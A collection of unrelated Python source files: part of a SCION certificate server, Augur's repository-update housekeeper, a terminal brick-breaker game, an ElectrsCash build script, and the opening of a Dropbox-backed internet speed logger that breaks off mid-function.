if meta and meta.ia != rep.isd_as:
raise SCIONVerificationError("Response from other ISD-AS: %s" % rep.isd_as)
if drkey_time() - rep.p.timestamp > DRKEY_REQUEST_TIMEOUT:
raise SCIONVerificationError("Expired reply from %s. %ss old. Max %ss" % (
rep.isd_as, drkey_time() - rep.p.timestamp, DRKEY_REQUEST_TIMEOUT))
trc = self.trust_store.get_trc(rep.isd_as[0])
chain = self.trust_store.get_cert(rep.isd_as, rep.p.certVerSrc)
err = []
if not chain:
self._send_cc_request(rep.isd_as, rep.p.certVerSrc)
err.append("Certificate not present for %s(v: %s)" % (rep.isd_as, rep.p.certVerSrc))
if not trc:
self._send_trc_request(rep.isd_as[0], rep.p.trcVer)
err.append("TRC not present for %s(v: %s)" % (rep.isd_as[0], rep.p.trcVer))
if err:
raise SCIONVerificationError(", ".join(err))
raw = get_signing_input_rep(rep.isd_as, rep.p.timestamp, rep.p.expTime, rep.p.cipher)
try:
verify_sig_chain_trc(raw, rep.p.signature, rep.isd_as, chain, trc)
except SCIONVerificationError as e:
raise SCIONVerificationError(str(e))
return chain.certs[0]
def _check_drkey(self, drkey):
"""
Check if first order DRKey with the same (SrcIA, DstIA, expTime)
is available.
:param FirstOrderDRKey drkey: the searched DRKey.
:returns: if the the first order DRKey is available.
:rtype: Bool
"""
if drkey in self.first_order_drkeys:
return True
return False
def _fetch_drkey(self, drkey, _):
"""
Fetch missing first order DRKey with the same (SrcIA, DstIA, expTime).
:param FirstOrderDRKey drkey: The missing DRKey.
"""
cert = self.trust_store.get_cert(self.addr.isd_as)
trc = self.trust_store.get_trc(self.addr.isd_as[0])
if not cert or not trc:
logging.warning("DRKeyRequest for %s not sent. Own CertChain/TRC not present.",
drkey.src_ia)
return
req = get_drkey_request(drkey.src_ia, False, self.signing_key,
cert.certs[0].version, trc.version)
path_meta = self._get_path_via_sciond(drkey.src_ia)
if path_meta:
meta = self._build_meta(drkey.src_ia, host=SVCType.CS_A, path=path_meta.fwd_path())
req_id = mk_ctrl_req_id()
self.send_meta(CtrlPayload(DRKeyMgmt(req)), meta)
logging.info("DRKeyRequest (%s) sent to %s via %s [id: %016x]",
req.short_desc(), meta, path_meta, req_id)
else:
logging.warning("DRKeyRequest (for %s) not sent", req.short_desc())
def _reply_proto_drkey(self, drkey, meta):
pass # TODO(roosd): implement in future PR
def _get_drkey_secret(self, exp_time):
"""
Get the drkey secret. A new secret is initialized if no secret is found.
:param int exp_time: expiration time of the drkey secret
:return: the according drkey secret
:rtype: DRKeySecretValue
"""
sv = self.drkey_secrets.get(exp_time)
if not sv:
sv = DRKeySecretValue(kdf(self.master_key, b"Derive DRKey Key"), exp_time)
self.drkey_secrets[sv.exp_time] = sv
return sv
def _init_metrics(self):
super()._init_metrics()
for type_ in ("trc", "cc", "drkey"):
REQS_TOTAL.labels(**self._labels, type=type_).inc(0)
IS_MASTER.labels(**self._labels).set(0)
def run(self):
"""
Run an instance of the Cert Server.
"""
threading.Thread(
target=thread_safety_net, args=(self.worker,),
name="CS.worker", daemon=True).start()
super().run()
if __name__ == "__main__":
main_wrapper(main_default, CertServer)
|
housekeeper.py
|
#SPDX-License-Identifier: MIT
"""
Keeps data up to date
"""
import coloredlogs
from copy import deepcopy
import logging, os, time, requests
import logging.config
from multiprocessing import Process, get_start_method
from sqlalchemy.ext.automap import automap_base
import sqlalchemy as s
import pandas as pd
from sqlalchemy import MetaData
from augur.logging import AugurLogging
from urllib.parse import urlparse
import warnings
warnings.filterwarnings('ignore')
logger = logging.getLogger(__name__)
class Housekeeper:
def __init__(self, broker, augur_app):
logger.info("Booting housekeeper")
self._processes = []
self.augur_logging = augur_app.logging
self.jobs = deepcopy(augur_app.config.get_value("Housekeeper", "jobs"))
self.update_redirects = deepcopy(augur_app.config.get_value("Housekeeper", "update_redirects"))
self.broker_host = augur_app.config.get_value("Server", "host")
self.broker_port = augur_app.config.get_value("Server", "port")
self.broker = broker
self.db = augur_app.database
self.helper_db = augur_app.operations_database
helper_metadata = MetaData()
helper_metadata.reflect(self.helper_db, only=['worker_job'])
HelperBase = automap_base(metadata=helper_metadata)
HelperBase.prepare()
self.job_table = HelperBase.classes.worker_job.__table__
repoUrlSQL = s.sql.text("""
SELECT repo_git FROM repo
""")
rs = pd.read_sql(repoUrlSQL, self.db, params={})
all_repos = rs['repo_git'].values.tolist()
# If enabled, updates all redirects of repositories
# and organizations urls for configured repo_group_id
self.update_url_redirects()
# List of tasks that need periodic updates
self.schedule_updates()
def schedule_updates(self):
"""
Starts update processes
"""
self.prep_jobs()
self.augur_logging.initialize_housekeeper_logging_listener()
logger.info("Scheduling update processes")
for job in self.jobs:
process = Process(target=self.updater_process, name=job["model"], args=(self.broker_host, self.broker_port, self.broker, job, (self.augur_logging.housekeeper_job_config, self.augur_logging.get_config())))
self._processes.append(process)
process.start()
@staticmethod
def updater_process(broker_host, broker_port, broker, job, logging_config):
"""
Controls a given plugin's update process
"""
logging.config.dictConfig(logging_config[0])
logger = logging.getLogger(f"augur.jobs.{job['model']}")
coloredlogs.install(level=logging_config[1]["log_level"], logger=logger, fmt=logging_config[1]["format_string"])
if logging_config[1]["quiet"]:
logger.disabled
if 'repo_group_id' in job:
repo_group_id = job['repo_group_id']
logger.info('Housekeeper spawned {} model updater process for repo group id {}'.format(job['model'], repo_group_id))
else:
repo_group_id = None
logger.info('Housekeeper spawned {} model updater process for repo ids {}'.format(job['model'], job['repo_ids']))
try:
compatible_worker_found = False
# Waiting for compatible worker
while True:
if not compatible_worker_found:
for worker in list(broker._getvalue().keys()):
if job['model'] in broker[worker]['models'] and job['given'] in broker[worker]['given']:
compatible_worker_found = True
time.sleep(3)
continue
logger.info("Housekeeper recognized that the broker has a worker that " +
"can handle the {} model... beginning to distribute maintained tasks".format(job['model']))
while True:
logger.info('Housekeeper updating {} model with given {}...'.format(
job['model'], job['given'][0]))
if job['given'][0] == 'git_url' or job['given'][0] == 'github_url':
for repo in job['repos']:
if job['given'][0] == 'github_url' and 'github.com' not in repo['repo_git']:
continue
given_key = 'git_url' if job['given'][0] == 'git_url' else 'github_url'
task = {
"job_type": job['job_type'] if 'job_type' in job else 'MAINTAIN',
"models": [job['model']],
"display_name": "{} model for url: {}".format(job['model'], repo['repo_git']),
"given": {}
}
task['given'][given_key] = repo['repo_git']
if "focused_task" in repo:
task["focused_task"] = repo['focused_task']
try:
requests.post('http://{}:{}/api/unstable/task'.format(
broker_host,broker_port), json=task, timeout=10)
except Exception as e:
logger.error("Error encountered: {}".format(e))
logger.debug(task)
time.sleep(15)
elif job['given'][0] == 'repo_group':
task = {
"job_type": job['job_type'] if 'job_type' in job else 'MAINTAIN',
"models": [job['model']],
"display_name": "{} model for repo group id: {}".format(job['model'], repo_group_id),
"given": {
"repo_group": job['repos']
}
}
try:
requests.post('http://{}:{}/api/unstable/task'.format(
broker_host,broker_port), json=task, timeout=10)
except Exception as e:
logger.error("Error encountered: {}".format(e))
logger.info("Housekeeper finished sending {} tasks to the broker for it to distribute to your worker(s)".format(len(job['repos'])))
time.sleep(job['delay'])
except KeyboardInterrupt as e:
pass
def join_updates(self):
"""
Join to the update processes
"""
for process in self._processes:
logger.debug(f"Joining {process.name} update process")
process.join()
def shutdown_updates(self):
"""
Ends all running update processes
"""
for process in self._processes:
# logger.debug(f"Terminating {process.name} update process")
process.terminate()
def prep_jobs(self):
logger.info("Preparing housekeeper jobs")
for job in self.jobs:
if 'repo_group_id' in job or 'repo_ids' in job:
# If RG id is 0 then it just means to query all repos
where_and = 'AND' if job['model'] == 'issues' and 'repo_group_id' in job else 'WHERE'
where_condition = '{} repo_group_id = {}'.format(where_and, job['repo_group_id']
) if 'repo_group_id' in job and job['repo_group_id'] != 0 else '{} repo.repo_id IN ({})'.format(
where_and, ",".join(str(id) for id in job['repo_ids'])) if 'repo_ids' in job else ''
repo_url_sql = s.sql.text("""
SELECT repo.repo_id, repo.repo_git, pull_request_count, collected_pr_count,
(repo_info.pull_request_count - pr_count.collected_pr_count) AS pull_requests_missing
FROM augur_data.repo LEFT OUTER JOIN (
SELECT count(*) AS collected_pr_count, repo_id
FROM pull_requests GROUP BY repo_id ) pr_count
ON pr_count.repo_id = repo.repo_id LEFT OUTER JOIN (
SELECT repo_id, MAX ( data_collection_date ) AS last_collected
FROM augur_data.repo_info
GROUP BY repo_id) recent_info
ON recent_info.repo_id = pr_count.repo_id LEFT OUTER JOIN repo_info
ON recent_info.repo_id = repo_info.repo_id
AND repo_info.data_collection_date = recent_info.last_collected
{}
GROUP BY repo.repo_id, repo_info.pull_request_count, pr_count.collected_pr_count
ORDER BY pull_requests_missing DESC NULLS LAST
""".format(where_condition)) if job['model'] == 'pull_requests' else s.sql.text("""
SELECT
*
FROM
(
( SELECT repo_git, repo.repo_id, issues_enabled, COUNT ( * ) AS meta_count
FROM repo left outer join repo_info on repo.repo_id = repo_info.repo_id
--WHERE issues_enabled = 'true'
GROUP BY repo.repo_id, issues_enabled
ORDER BY repo.repo_id ) zz
LEFT OUTER JOIN (
SELECT repo.repo_id,
repo.repo_name,
b.issues_count,
d.repo_id AS issue_repo_id,
e.last_collected,
COUNT ( * ) AS issues_collected_count,
(
b.issues_count - COUNT ( * )) AS issues_missing,
ABS (
CAST (( COUNT ( * )) AS DOUBLE PRECISION ) / CAST ( b.issues_count + 1 AS DOUBLE PRECISION )) AS ratio_abs,
(
CAST (( COUNT ( * )) AS DOUBLE PRECISION ) / CAST ( b.issues_count + 1 AS DOUBLE PRECISION )) AS ratio_issues
FROM
augur_data.repo left outer join
augur_data.pull_requests d on d.repo_id = repo.repo_id left outer join
augur_data.repo_info b on d.repo_id = b.repo_id left outer join
( SELECT repo_id, MAX ( data_collection_date ) AS last_collected FROM augur_data.repo_info GROUP BY repo_id ORDER BY repo_id ) e
on e.repo_id = d.repo_id and b.data_collection_date = e.last_collected
WHERE d.pull_request_id IS NULL
{}
GROUP BY
repo.repo_id,
d.repo_id,
b.issues_count,
e.last_collected
ORDER BY ratio_abs
) yy ON zz.repo_id = yy.repo_id
) D
ORDER BY ratio_abs NULLS FIRST
""".format(where_condition)) if job['model'] == 'issues' and 'repo_group_id' in job else s.sql.text("""
SELECT repo_git, repo_id FROM repo {} ORDER BY repo_id ASC
""".format(where_condition)) if 'order' not in job else s.sql.text("""
SELECT repo_git, repo.repo_id, count(*) as commit_count
FROM augur_data.repo left outer join augur_data.commits
on repo.repo_id = commits.repo_id
{}
group by repo.repo_id ORDER BY commit_count {}
""".format(where_condition, job['order']))
reorganized_repos = pd.read_sql(repo_url_sql, self.db, params={})
if len(reorganized_repos) == 0:
logger.warning("Trying to send tasks for repo group, but the repo group does not contain any repos: {}".format(repo_url_sql))
job['repos'] = []
continue
if 'starting_repo_id' in job:
last_id = job['starting_repo_id']
else:
repoIdSQL = s.sql.text("""
SELECT since_id_str FROM worker_job
WHERE job_model = '{}'
""".format(job['model']))
job_df = pd.read_sql(repoIdSQL, self.helper_db, params={})
# If there is no job tuple found, insert one
if len(job_df) == 0:
job_tuple = {
'job_model': job['model'],
'oauth_id': 0
}
result = self.helper_db.execute(self.job_table.insert().values(job_tuple))
logger.debug("No job tuple for {} model was found, so one was inserted into the job table: {}".format(job['model'], job_tuple))
# If a last id is not recorded, start from beginning of repos
# (first id is not necessarily 0)
try:
last_id = int(job_df.iloc[0]['since_id_str'])
except:
last_id = 0
jobHistorySQL = s.sql.text("""
SELECT max(history_id) AS history_id, status FROM worker_history
GROUP BY status
LIMIT 1
""")
history_df = pd.read_sql(jobHistorySQL, self.helper_db, params={})
finishing_task = False
if len(history_df.index) != 0:
if history_df.iloc[0]['status'] == 'Stopped':
self.history_id = int(history_df.iloc[0]['history_id'])
finishing_task = True
# Rearrange repos so the one after the last one that
# was completed will be ran first (if prioritized ordering is not available/enabled)
if job['model'] not in ['issues', 'pull_requests']:
before_repos = reorganized_repos.loc[reorganized_repos['repo_id'].astype(int) < last_id]
after_repos = reorganized_repos.loc[reorganized_repos['repo_id'].astype(int) >= last_id]
reorganized_repos = after_repos.append(before_repos)
if 'all_focused' in job:
reorganized_repos['focused_task'] = job['all_focused']
reorganized_repos = reorganized_repos.to_dict('records')
if finishing_task:
reorganized_repos[0]['focused_task'] = 1
job['repos'] = reorganized_repos
elif 'repo_id' in job:
job['repo_group_id'] = None
repoUrlSQL = s.sql.text("""
SELECT repo_git, repo_id FROM repo WHERE repo_id = {}
""".format(job['repo_id']))
rs = pd.read_sql(repoUrlSQL, self.db, params={})
if 'all_focused' in job:
rs['focused_task'] = job['all_focused']
rs = rs.to_dict('records')
job['repos'] = rs
# time.sleep(120)
def update_url_redirects(self):
if 'switch' in self.update_redirects and self.update_redirects['switch'] == 1 and 'repo_group_id' in self.update_redirects:
repos_urls = self.get_repos_urls(self.update_redirects['repo_group_id'])
if self.update_redirects['repo_group_id'] == 0:
logger.info("Repo Group Set to Zero for URL Updates")
else:
logger.info("Repo Group ID Specified.")
for url in repos_urls:
url = self.trim_git_suffix(url)
if url:
r = requests.get(url)
check_for_update = url != r.url
if check_for_update:
self.update_repo_url(url, r.url, self.update_redirects['repo_group_id'])
def trim_git_suffix(self, url):
if url.endswith('.git'):
url = url.replace('.git', '')
elif url.endswith('.github.io'):
url = url.replace('.github.io', '')
elif url.endswith('/.github'):
url = ''
return url
def get_repos_urls(self, repo_group_id):
if self.update_redirects['repo_group_id'] == 0:
repos_sql = s.sql.text("""
SELECT repo_git FROM repo
""")
logger.info("repo_group_id is 0")
else:
repos_sql = s.sql.text("""
SELECT repo_git FROM repo
WHERE repo_group_id = ':repo_group_id'
""")
repos = pd.read_sql(repos_sql, self.db, params={'repo_group_id': repo_group_id})
if len(repos) == 0:
logger.info("Did not find any repositories stored in augur_database for repo_group_id {}\n".format(repo_group_id))
return repos['repo_git']
def update_repo_url(self, old_url, new_url, repo_group_id):
trimmed_new_url = self.trim_git_suffix(new_url)
if not trimmed_new_url:
logger.info("New repo is named .github : {} ... skipping \n".format(new_url))
return
else:
new_url = trimmed_new_url
old_repo_path = Housekeeper.parseRepoName(old_url)
old_repo_group_name = old_repo_path[0]
new_repo_path = Housekeeper.parseRepoName(new_url)
new_repo_group_name = new_repo_path[0]
if old_repo_group_name != new_repo_group_name:
# verifying the old repo group name is available in the database
old_rg_name_sql = s.sql.text("""
SELECT rg_name FROM repo_groups
WHERE repo_group_id = ':repo_group_id'
""")
old_rg_name_from_DB = pd.read_sql(old_rg_name_sql, self.db, params={'repo_group_id': repo_group_id})
if len(old_rg_name_from_DB['rg_name']) > 0 and old_repo_group_name != old_rg_name_from_DB['rg_name'][0]:
logger.info("Incoming old repo group name doesn't match the DB record for repo_group_id {} . Incoming name: {} DB record: {} \n".format(repo_group_id, old_repo_group_name, old_rg_name_from_DB['rg_name'][0]))
# checking if the new repo group name already exists and
# inserting it in repo_groups if it doesn't
rg_name_check_sql = s.sql.text("""
SELECT rg_name, repo_group_id FROM repo_groups
WHERE rg_name = :new_repo_group_name
""")
rg_name_check = pd.read_sql(rg_name_check_sql, self.db, params={'new_repo_group_name': new_repo_group_name})
new_rg_name_already_exists = len(rg_name_check['rg_name']) > 0
if new_rg_name_already_exists:
new_repo_group_id = rg_name_check['repo_group_id'][0]
else:
insert_sql = s.sql.text("""
INSERT INTO repo_groups("rg_name", "rg_description", "rg_website", "rg_recache", "rg_last_modified", "rg_type", "tool_source", "tool_version", "data_source", "data_collection_date")
VALUES (:new_repo_group_name, '', '', 0, CURRENT_TIMESTAMP, 'Unknown', 'Loaded by user', '1.0', 'Git', CURRENT_TIMESTAMP) RETURNING repo_group_id;
""")
new_repo_group_id = self.db.execute(insert_sql, new_repo_group_name=new_repo_group_name).fetchone()[0]
logger.info("Inserted repo group {} with id {}\n".format(new_repo_group_name, new_repo_group_id))
new_repo_group_id = '%s' % new_repo_group_id
update_sql = s.sql.text("""
UPDATE repo SET repo_git = :new_url, repo_path = NULL, repo_name = NULL, repo_status = 'New', repo_group_id = :new_repo_group_id
WHERE repo_git = :old_url
""")
self.db.execute(update_sql, new_url=new_url, new_repo_group_id=new_repo_group_id, old_url=old_url)
logger.info("Updated repo url from {} to {}\n".format(new_url, old_url))
else:
update_sql = s.sql.text("""
UPDATE repo SET repo_git = :new_url, repo_path = NULL, repo_name = NULL, repo_status = 'New'
WHERE repo_git = :old_url
""")
self.db.execute(update_sql, new_url=new_url, old_url=old_url)
logger.info("Updated repo url from {} to {}\n".format(new_url, old_url))
def parseRepoName(repo_url):
path = urlparse(repo_url).path
parts = path.split('/')
return parts[1:]
|
WindowManagement.py
|
import numpy as np
import colorama
from time import sleep
from .Components import EmptyPage
import signal
from ..utils.colors import color_map, color_map_vectorized, cursor_goto, clear_screen
from ..utils.genComponentID import calculate_least_value_nin_array
from ..utils.inputHandler import getchar
from time import time
from queue import Queue
from threading import Thread
from .Components import Border
from os import system, name
from .Ball import Ball
from .Paddle import Paddle
from .Powerup import Powerup, SplitPowerup
from .Numbers import Score
from random import choice
from ..utils.collision import collide_inner
from copy import deepcopy
from .Numbers import Lives
from .Level import Level
# An exception to raise whenever an alarm hits when taking inputs
class CustomAlarmException(Exception):
pass
class Window:
def __init__(self, config):
self.config = config
self.components = {
0: Border(config.WIDTH, config.HEIGHT, 8) if config.BORDER else EmptyPage(config.WIDTH, config.HEIGHT),
1: Score((4, 2), 4)
}
self.active_components = [0, 1]
self.input_components = []
self.ball_components = []
self.paddle_component = None
self.active_powerup = None
self.input_queue = Queue()
self.allowed_inputs = ["a", "d", " ", "r", "w", "s"]
colorama.init(autoreset=True)
self.exit = False
self.lives_manager = Lives(self.config.WIDTH, 2, 5)
self.add_component(self.lives_manager, True)
def activate_component(self, component_id):
if component_id not in self.active_components:
self.active_components.append(component_id)
def deactivate_component(self, component_id):
if component_id in self.active_components:
self.active_components = [el for el in self.active_components if el != component_id]
def add_component(self, component, make_active=False, takes_input=False):
component_id = calculate_least_value_nin_array(self.active_components)
self.components[component_id] = component
if make_active:
self.activate_component(component_id)
if takes_input:
self.input_components.append(component_id)
if isinstance(component, Ball):
self.ball_components.append(component_id)
elif isinstance(component, Paddle):
self.paddle_component = component
def remove_component(self, component_id):
if component_id in self.components:
del self.components[component_id]
if component_id in self.active_components:
self.active_components = [el for el in self.active_components if el != component_id]
if component_id in self.input_components:
self.input_components = [el for el in self.input_components if el != component_id]
if component_id in self.ball_components:
self.ball_components = [el for el in self.ball_components if el != component_id]
def render_components(self):
num_active = len(self.active_components)
frame_buffer = np.zeros((self.config.WIDTH, self.config.HEIGHT))
for component_id in self.active_components:
if not self.config.BORDER and num_active > 1 and component_id == 0:
continue
component = self.components[component_id]
bbox = [*component.start, component.width + component.start[0], component.height + component.start[1]]
frame_buffer[bbox[0]:bbox[2], bbox[1]:bbox[3]] = component.render()
Window.blit(frame_buffer.T)
def game_loop(self):
renderer = Thread(target=self.render_thread)
renderer.start()
self.input_thread()
renderer.join()
# Do all cleanup here
if name == 'posix':
_ = system('tput cnorm; clear')
else:
_ = system('cls')
exit()
def render_thread(self):
sub_frame_number = 0
graphics_update = int(self.config.FRAME_DURATION / self.config.COUNT_GRAPHICS_UPDATES)
physics_update = int(self.config.FRAME_DURATION / self.config.COUNT_PHYSICS_UPDATES)
start_time = time()
# clear_screen()
while not self.exit:
if self.config.ONE_FRAME_ONLY and sub_frame_number == self.config.FRAME_DURATION - 1:
break
# Perform physics updates and other event updates here - more than once per frame
if sub_frame_number % physics_update == 0:
# Check if there are no balls left, if so reduce the lives and add a new ball
if len(self.ball_components) == 0:
gameover = self.lives_manager.decrease_life()
# Check if game is over or not, if over exit
if gameover:
self.exit = True
else:
ball = Ball(-18, self.paddle_component)
self.add_component(ball, True, True)
# Cleanup all dead powerup components as well as catch the completion of a level
tobe_removed = []
for (component_id, component) in self.components.items():
if isinstance(component, Level) and component.is_complete:
self.exit = True
# If powerup components is not active and has already started, then only state it can be in is dead state
if issubclass(type(component), Powerup) and ((component.start_time != -1 and not component.is_active) or ()):
# Check if the powerup component is a ball split to revert it
if isinstance(component, SplitPowerup):
for ball_id in self.ball_components[len(self.ball_components)//2:]:
tobe_removed.append(ball_id)
tobe_removed.append(component_id)
for component_id in tobe_removed:
self.remove_component(component_id)
update_time = time() - start_time
# Send all the inputs over to the components that require them
while not self.input_queue.empty():
event = self.input_queue.get(block=False)
for to_dispatch in self.input_components:
self.components[to_dispatch].handle_event(event, (2, 2, self.config.WIDTH - 2, self.config.HEIGHT - 1))
# Perform time updates
for to_dispatch in self.input_components:
self.components[to_dispatch].handle_event("t", update_time)
# Perform the ball's collision updates
powerup_to_be_added = None
for component_id in self.active_components:
for ball_id in self.ball_components:
component = self.components[component_id]
if component.is_collideable:
powerup, score = self.components[ball_id].collide_with(component)
if powerup is not None and powerup_to_be_added is None:
powerup_to_be_added = powerup
if score != 0:
self.components[1].update_score(score)
# Add the powerup component to be rendered
if powerup_to_be_added is not None:
self.add_component(powerup_to_be_added, True, True)
# Perform the paddle's collision updates
changed_id = -1
to_add_balls = []
for component_id in self.active_components:
component = self.components[component_id]
if issubclass(type(component), Powerup) and self.paddle_component.start[0] <= component.start[0] <= self.paddle_component.start[0] + self.paddle_component.width and component.start[1] == self.paddle_component.start[1] - 1:
changed_id = component_id
self.components[changed_id].paddle = self.paddle_component
self.components[changed_id].balls = [self.components[ball_id] for ball_id in self.ball_components]
self.components[changed_id].speed = 0
self.components[changed_id].start = (60, 4) + np.random.randint(-3, 3, 2)
self.components[changed_id].execute_powerup(update_time)
# Check if the captured powerup is a multiplier - if it is then multiply the balls
if isinstance(component, SplitPowerup):
for ball_id in self.ball_components:
ball = self.components[ball_id]
to_add_balls.append(Ball(
ball.color,
ball.paddle,
ball_pos=ball.pos + choice([-1, 1]) * np.random.randint(1, 3, 2),
stuck_pos=ball.stuck_to_paddle,
vel_dir=(ball.vel_dir * np.array([-1, 1])),
))
for ball in to_add_balls:
self.add_component(ball, True, True)
# Remove the caught powerup from getting rendered
if changed_id > 0:
self.deactivate_component(changed_id)
# Perform all the collision of powerups with the walls and kill it accordingly
tobe_removed = []
for (component_id, component) in self.components.items():
if (issubclass(type(component), Powerup) or isinstance(component, Ball)) and component.start[1] >= self.config.HEIGHT - 2:
tobe_removed.append(component_id)
for comp_id in tobe_removed:
self.remove_component(comp_id)
# Update the graphics once per frame
if sub_frame_number % graphics_update == 0:
self.render_components()
sub_frame_number += 1
def input_thread(self):
# Set Alarm Signal handlers to catch and raise an exception
def alarmSignalHandler(signalNum, frame):
raise CustomAlarmException
signal.signal(signal.SIGALRM, alarmSignalHandler)
while not self.exit:
signal.setitimer(signal.ITIMER_REAL, 0.1) # Set a timer with 0.1 seconds interval
input_char = ''
try:
input_char = getchar()
signal.alarm(0) # Cancelled the alarm signal if we get a character
except CustomAlarmException:
# The raised exception stops from taking the input
pass
# Check for quit character and return
if input_char == 'q':
self.exit = True
# Push the input to the inputs queue after checking if it valid
if input_char in self.allowed_inputs:
self.input_queue.put(input_char)
@staticmethod
def blit(buffer):
buffer = color_map_vectorized(buffer)
for row in range(buffer.shape[0]):
cursor_goto(row + 1, 0)
print("".join(buffer[row]))
|
build_electrs.py
|
#!/usr/bin/env python3
import argparse
import logging
import os
import sys
import shutil
PROJECT_NAME = "ElectrsCash"
GIT_REPO = "https://github.com/BitcoinUnlimited/{}.git".format(PROJECT_NAME)
# When released put a tag here 'v2.0.0'
# When in development, put 'master' here.
GIT_BRANCH = "v3.0.0"
# When released put a hash here: "aa95d64d050c286356dadb78d19c2e687dec85cf"
# When in development, put 'None' here
EXPECT_HEAD = "9288d9f1bc828e06dca3b8783567c7557530740b"
ROOT_DIR = os.path.realpath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
ELECTRS_DIR = os.path.join(ROOT_DIR, PROJECT_NAME)
ELECTRS_BIN = "electrscash"
parser = argparse.ArgumentParser()
parser.add_argument('--allow-modified', help='Allow building modified/dirty repo',
action = "store_true")
parser.add_argument('--verbose', help='Sets log level to DEBUG',
action = "store_true")
parser.add_argument('--dst', help='Where to copy produced binary',
default=os.path.join(ROOT_DIR, "src"))
parser.add_argument('--target', help='Target platform (e.g. x86_64-pc-linux-gnu)',
default="x86_64-unknown-linux-gnu")
parser.add_argument('--debug', help="Do a debug build", action = "store_true")
parser.add_argument('--builddir', help="Out of source build directory", default=None)
args = parser.parse_args()
level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(format = '%(asctime)s.%(levelname)s: %(message)s',
level=level,
stream=sys.stdout)
def bail(*args):
logging.error(*args)
sys.exit(1)
def check_dependencies():
v = sys.version_info
if v[0] < 3 or (v[0] == 3 and v[1] < 3):
bail("python >= 3.3 required");
try:
import git
except Exception as e:
logging.error("Failed to 'import git'")
logging.error("Tip: Install with: python3 -m pip install gitpython")
logging.error("Tip: On Debian/Ubuntu you can install python3-git")
bail(str(e))
import shutil
if shutil.which("cargo") is None:
logging.error("Cannot find 'cargo', will not be able to build {}".format(PROJECT_NAME))
logging.error("You need to install rust (1.38+) https://rustup.rs/")
logging.error("Tip: On Debian/Ubuntu you need to install cargo")
bail("rust not found")
if shutil.which("clang") is None:
logging.error("Cannot find 'clang', will not be able to build {}".format(PROJECT_NAME))
logging.error("Tip: On Debian/Ubuntu you need to install clang")
bail("clang not found")
if not os.path.isdir(args.dst):
bail("--dst provided '%s' is not a directory", args.dst)
def clone_repo():
import git
logging.info("Cloning %s to %s", GIT_REPO, ELECTRS_DIR)
repo = git.Repo.clone_from(GIT_REPO, ELECTRS_DIR, branch=GIT_BRANCH)
def verify_repo(allow_modified):
import git
repo = git.Repo(ELECTRS_DIR)
if repo.is_dirty():
logging.error("Validation failed - %s has local modifications. Use `--allow-modified` if you wanted to build from a dirty repository", ELECTRS_DIR)
allow_modified or bail("Bailing")
if EXPECT_HEAD == None:
logging.warning("ElectrsCash is not fixed to a specific revision. Please assign the EXPECT_HEAD variable in build_electrs.py before releasing.")
if EXPECT_HEAD != None and repo.head.object.hexsha != EXPECT_HEAD:
# TODO: Add command line option to reset HEAD to GIT_BRANCH at EXPECT_HEAD
logging.error("Validation failed - %s HEAD differs from expected (%s vs %s)",
PROJECT_NAME, repo.head.object.hexsha, EXPECT_HEAD)
allow_modified or bail("Bailing")
def output_reader(pipe, queue):
try:
with pipe:
for l in iter(pipe.readline, b''):
queue.put(l)
finally:
queue.put(None)
def cargo_run(args):
import subprocess
from threading import Thread
from queue import Queue
cargo = shutil.which("cargo")
args = [cargo] + args
logging.info("Running %s", args)
assert cargo is not None
p = subprocess.Popen(args, cwd = ELECTRS_DIR,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
q = Queue()
Thread(target = output_reader, args = [p.stdout, q]).start()
Thread(target = output_reader, args = [p.stderr, q]).start()
for line in iter(q.get, None):
logging.info(line.decode('utf-8').rstrip())
p.wait()
rc = p.returncode
assert rc is not None
if rc != 0:
bail("cargo failed with return code %s", rc)
def get_target(makefile_target):
# Try to map target passed from makefile to the equalent in rust
# To see supported targets, run: rustc --print target-list
# Trim away darwin version number
if makefile_target.startswith('x86_64-apple-darwin'):
makefile_target = 'x86_64-apple-darwin'
target_map = {
'x86_64-pc-linux-gnu' : 'x86_64-unknown-linux-gnu',
'i686-pc-linux-gnu' : 'i686-unknown-linux-gnu',
'x86_64-apple-darwin': 'x86_64-apple-darwin'
}
if makefile_target in target_map:
return target_map[makefile_target]
if makefile_target in target_map.values():
return makefile_target
logging.warn("Target %s is not mapped, passing it rust and hoping it works"
% makefile_target)
return makefile_target
check_dependencies()
if not os.path.exists(ELECTRS_DIR):
clone_repo()
verify_repo(args.allow_modified)
def build_flags(debug, target, builddir):
flags = ["--target={}".format(get_target(target))]
if builddir is not None:
flags.append("--target-dir={}".format(os.path.abspath(builddir)))
if debug:
return flags
return flags + ["--release"]
cargo_run(["build", "--verbose", "--locked"] + build_flags(args.debug, args.target, args.builddir))
cargo_run(["test", "--verbose", "--locked"] + build_flags(args.debug, args.target, args.builddir))
def build_type_dir(debug):
if debug:
return "debug"
return "release"
def binary_dir(target, debug, builddir):
"""
The directory where the electrscash binaries are built.
"""
root = builddir if builddir is not None else os.path.join(ELECTRS_DIR, "target")
return os.path.join(root, get_target(target), build_type_dir(debug))
src = os.path.join(binary_dir(args.target, args.debug, args.builddir), ELECTRS_BIN)
logging.info("Copying %s to %s", src, args.dst)
shutil.copy(src, args.dst)
logging.info("Done")
|
main.py
|
from threading import Thread
import datetime
import speedtest
import urllib.request
import time
import sqlite3
import re
import dropbox
from dropbox.files import WriteMode
from dropbox.exceptions import ApiError
# backing up the database to dropbox
def backup():
localfile = './speedloggerdb.db'
destination = '/speedloggerdb.db'
token = 'YOUR TOKEN' # Add your personal Dropbox Access Token as String
dbx = dropbox.Dropbox(token) # Connecting to dropbox folder
with open('./speedloggerdb.db', 'rb') as f:
# We use WriteMode=overwrite to make sure that the settings in the file
# are changed on upload
print("Uploading " + localfile + " to Dropbox")
try:
dbx.files_upload(f.read(), destination, mode=WriteMode('overwrite'))
except ApiError as err:
pass
# fetches the result number of the last entry and adds 1
def getnewrnr(cursor):
cursor.execute("SELECT rnr FROM results ORDER BY rnr DESC LIMIT 1")
return cursor.fetchone()[0] + 1
# corrects the time format return from datetime for regex
def correctdate(hours, minutes):
if minutes <= 9:
return str(hours) + ":0" + str(minutes)
else:
return str(hours) + ":" + str(minutes)
# fixes the datetime format to a readable format
def get_date(date):
return datetime.datetime.strptime(date, '%Y-%m-%d').strftime('%d.%m.%y')
def speedlogger():
print("started speedlogger")
conn = sqlite3.connect("speedloggerdb.db") # establishing database connection
c = conn.cursor()
currenttime = correctdate(datetime.datetime.now().hour, datetime.datetime.now().minute) # Format 00:00
currentday = get_date(str(datetime.datetime.now().date()))
try:
print("running speedtest")
servers = []
